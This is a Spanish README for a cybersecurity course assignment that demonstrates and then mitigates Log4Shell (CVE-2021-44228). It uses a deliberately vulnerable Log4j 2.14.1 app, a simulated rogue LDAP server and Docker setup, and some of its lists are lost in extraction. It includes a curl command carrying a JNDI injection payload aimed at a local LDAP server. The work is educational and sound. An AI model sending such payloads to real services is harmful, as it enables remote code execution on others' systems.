
Demo del exploit Log4Shell (CVE-2021-44228) para SEAS 8405. Incluye una aplicación Spring Boot vulnerable, un servidor LDAP falso, configuración de Docker, mapeo MITRE, respuesta a incidentes y una grabación de pantalla completa.
Este proyecto demuestra la explotación y mitigación de la vulnerabilidad Log4Shell (CVE-2021-44228) utilizando una aplicación web Java dockerizada con Log4j 2.14.1 vulnerable. La configuración también incluye un servidor LDAP malicioso simulado para demostrar la ruta de ataque de inyección JNDI.
Después de la explotación, el sistema se refuerza actualizando Log4j, validando la entrada y aplicando recomendaciones de MITRE D3FEND y ATT&CK.
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf
docker build -t vulnerable-app .
docker-compose up
La app estará disponible en:
http://localhost:8080
python3 ldap_server.py
Envía una solicitud como esta a la app:
curl http://localhost:8080?input=${jndi:ldap://localhost:8000/Exploit}
El servidor LDAP debería recibir la solicitud (esto simula el exploit JNDI).
Después de demostrar el ataque, el sistema fue protegido mediante:
${jndi:...})Ver mitigation_report.pdf para:
Si el video no se ha subido directamente, está disponible en el enlace del informe.
Serpil Rivas
SEAS 8405 – Arquitecturas de Ciberseguridad
Mayo 2025